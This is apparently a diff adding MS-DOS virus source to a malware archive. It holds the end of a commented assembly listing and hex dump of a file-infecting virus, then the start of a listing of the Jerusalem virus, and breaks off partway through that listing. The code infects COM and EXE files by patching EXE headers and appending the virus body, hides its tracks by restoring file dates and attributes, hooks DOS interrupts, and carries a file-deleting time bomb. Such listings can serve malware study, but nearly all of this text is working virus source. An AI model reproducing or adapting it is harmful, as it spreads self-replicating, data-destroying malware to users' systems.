;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. +;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. +;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... +;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C +;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7. +;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X... +;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9. +;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u +;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t( +;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX +;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$.. +;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P +;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?! +;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+ +;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z. +;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%. +;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum... +;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)... +;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)... +;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4 +;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>. +;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G... +;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR +;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u.. +;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw. +;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp... +;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6.. +;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u. +;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!.... +;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E... +;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4> +;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$ +;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8. +;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I +;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW. +;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M +;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9. +;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4 +;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM! +;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M +;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M! +;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_ +;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I. +;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x.. +;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.# +;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6 +;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!| +;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e. +;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3 +;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O. +;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|... +;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@ +;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!.. +;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t. +;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E +;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E. +;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X. +;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<. +;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k............. +;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]... +;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R......... +;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K.......... +;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:.... +;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................ +;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P.. +;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O...... +;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~ +;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p. +;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%....... +;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;<<<<<<<<<< ORIGINAL CODE BEGINS HERE +;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;>>>>>>>>>> ORIGINAL CODE ENDS HERE +;0910 4D 73 44 6F 73 +;-----------------------------------------------------------------------; + END diff --git a/MSDOS/Virus.MSDOS.Unknown.isreali.lst b/MSDOS/Virus.MSDOS.Unknown.isreali.lst new file mode 100644 index 00000000..84c88f9f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.isreali.lst @@ -0,0 +1,882 @@ + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; 